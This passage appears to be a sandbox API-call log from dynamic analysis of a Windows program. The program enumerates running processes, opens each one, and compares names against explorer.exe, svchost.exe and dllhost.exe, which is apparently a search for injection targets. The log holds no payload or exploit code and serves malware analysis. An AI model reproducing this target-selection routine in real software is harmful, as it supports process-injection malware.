lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0196.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0196.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0196.217] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0196.217] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0196.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0196.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0196.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0196.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0196.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0196.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0196.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0196.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0196.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0196.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0196.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0196.224] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.224] CloseHandle (hObject=0xd8) returned 1 [0196.224] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0196.224] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0196.224] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0196.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0196.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0196.225] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.225] CloseHandle (hObject=0xd8) returned 1 [0196.225] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0196.225] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0196.225] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0196.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0196.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0196.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0196.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0196.227] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.227] CloseHandle (hObject=0xd8) returned 1 [0196.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0196.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0196.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.228] CloseHandle (hObject=0xd8) returned 1 [0196.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0196.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0196.229] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.229] CloseHandle (hObject=0xd8) returned 1 [0196.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0196.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0196.229] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.229] CloseHandle (hObject=0xd8) returned 1 [0196.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0196.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0196.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.230] CloseHandle (hObject=0xd8) returned 1 [0196.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0196.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0196.231] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.231] CloseHandle (hObject=0xd8) returned 1 [0196.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0196.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0196.231] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.231] CloseHandle (hObject=0xd8) returned 1 [0196.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0196.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0196.232] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.232] CloseHandle (hObject=0xd8) returned 1 [0196.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0196.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0196.233] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.233] CloseHandle (hObject=0xd8) returned 1 [0196.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0196.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0196.233] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.233] CloseHandle (hObject=0xd8) returned 1 [0196.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0196.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0196.234] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.234] CloseHandle (hObject=0xd8) returned 1 [0196.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0196.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0196.235] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.235] CloseHandle (hObject=0xd8) returned 1 [0196.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0196.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0196.235] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.235] CloseHandle (hObject=0xd8) returned 1 [0196.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0196.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0196.236] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.236] CloseHandle (hObject=0xd8) returned 1 [0196.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0196.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0196.237] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.237] CloseHandle (hObject=0xd8) returned 1 [0196.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0196.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0196.237] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.237] CloseHandle (hObject=0xd8) returned 1 [0196.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0196.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0196.238] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.238] CloseHandle (hObject=0xd8) returned 1 [0196.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0196.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0196.239] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.239] CloseHandle (hObject=0xd8) returned 1 [0196.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0196.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0196.239] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.239] CloseHandle (hObject=0xd8) returned 1 [0196.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0196.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0196.240] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.240] CloseHandle (hObject=0xd8) returned 1 [0196.240] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0196.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0196.241] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.241] CloseHandle (hObject=0xd8) returned 1 [0196.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0196.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0196.242] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0196.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0196.243] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0196.243] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0196.244] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0196.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0196.336] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.336] CloseHandle (hObject=0xd8) returned 1 [0196.336] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0196.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0196.337] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.337] CloseHandle (hObject=0xd8) returned 1 [0196.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0196.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0196.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0196.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0196.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0196.338] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.338] CloseHandle (hObject=0xd8) returned 1 [0196.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0196.339] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0196.339] CloseHandle (hObject=0xd8) returned 1 [0196.339] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0196.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.339] 